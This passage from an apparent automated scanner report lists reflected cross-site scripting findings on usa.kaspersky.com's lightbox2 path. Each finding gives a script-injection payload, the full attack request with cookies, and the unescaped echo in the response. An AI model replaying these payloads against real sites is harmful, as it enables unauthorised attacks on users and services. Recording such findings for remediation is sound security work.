HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:12:57 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141977"
Content-Type: text/html; charset=utf-8
Content-Length: 31155
Date: Sun, 04 Sep 2011 13:13:03 GMT
X-Varnish: 1163133233
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node60fc8"-alert(1)-"39c8314a1f9f02d6a/12354/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
va
...[SNIP]...

1.80. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c717d"-alert(1)-"861f505fc3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nodec717d"-alert(1)-"861f505fc3c/12354/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:31 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141711"
Content-Type: text/html; charset=utf-8
Content-Length: 30617
Date: Sun, 04 Sep 2011 13:08:41 GMT
X-Varnish: 1163126048
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/nodec717d"-alert(1)-"861f505fc3c/12354/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.81. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99bf4"><script>alert(1)</script>4d3ab9eb3b25b2b8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /node99bf4"><script>alert(1)</script>4d3ab9eb3b25b2b8b/12354/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:12:29 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141949"
Content-Type: text/html; charset=utf-8
Content-Length: 31252
Date: Sun, 04 Sep 2011 13:12:33 GMT
X-Varnish: 1163132429
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node99bf4"><script>alert(1)</script>4d3ab9eb3b25b2b8b/12354/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0" />
...[SNIP]...

1.82. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbd5"><script>alert(1)</script>923210a76f3673d75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /node/123542bbd5"><script>alert(1)</script>923210a76f3673d75/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:14:01 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142041"
Content-Type: text/html; charset=utf-8
Content-Length: 30487
Date: Sun, 04 Sep 2011 13:14:08 GMT
X-Varnish: 1163135909
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/123542bbd5"><script>alert(1)</script>923210a76f3673d75/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0" />
...[SNIP]...

1.83. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a089"><script>alert(1)</script>3c8b24be29a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/123546a089"><script>alert(1)</script>3c8b24be29a/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:10:11 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141811"
Content-Type: text/html; charset=utf-8
Content-Length: 29949
Date: Sun, 04 Sep 2011 13:10:21 GMT
X-Varnish: 1163128976
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/123546a089"><script>alert(1)</script>3c8b24be29a/lightbox2" />
...[SNIP]...

1.84. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da3f8"-alert(1)-"318c97f1b524ecda2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /node/12354da3f8"-alert(1)-"318c97f1b524ecda2/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:14:25 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142065"
Content-Type: text/html; charset=utf-8
Content-Length: 30390
Date: Sun, 04 Sep 2011 13:14:31 GMT
X-Varnish: 1163136929
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/12354da3f8"-alert(1)-"318c97f1b524ecda2/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_co
...[SNIP]...

1.85. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff38b"-alert(1)-"240ef35a4a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node/12354ff38b"-alert(1)-"240ef35a4a3/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:10:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141844"
Content-Type: text/html; charset=utf-8
Content-Length: 29852
Date: Sun, 04 Sep 2011 13:10:50 GMT
X-Varnish: 1163129847
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/12354ff38b"-alert(1)-"240ef35a4a3/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.86. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 192f1"><script>alert(1)</script>390a361a01e590170 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /node/12354/lightbox2192f1"><script>alert(1)</script>390a361a01e590170?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:15:28 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142128"
Content-Type: text/html; charset=utf-8
Content-Length: 35309
Date: Sun, 04 Sep 2011 13:15:35 GMT
X-Varnish: 1163139026
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/12354/lightbox2192f1"><script>alert(1)</script>390a361a01e590170?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0" />
...[SNIP]...

1.87. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25387"><script>alert(1)</script>fb612ec141d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/12354/lightbox225387"><script>alert(1)</script>fb612ec141d HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:12:03 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141923"
Content-Type: text/html; charset=utf-8
Content-Length: 35067
Date: Sun, 04 Sep 2011 13:12:10 GMT
X-Varnish: 1163131606
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/12354/lightbox225387"><script>alert(1)</script>fb612ec141d" />
...[SNIP]...

1.88. http://usa.kaspersky.com/node/12354/lightbox2 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995fa"><script>alert(1)</script>7517b2c51a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/12354/lightbox2?995fa"><script>alert(1)</script>7517b2c51a6=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:03:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141432"
Content-Type: text/html; charset=utf-8
Content-Length: 20211
Date: Sun, 04 Sep 2011 13:04:06 GMT
X-Varnish: 1163117703
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
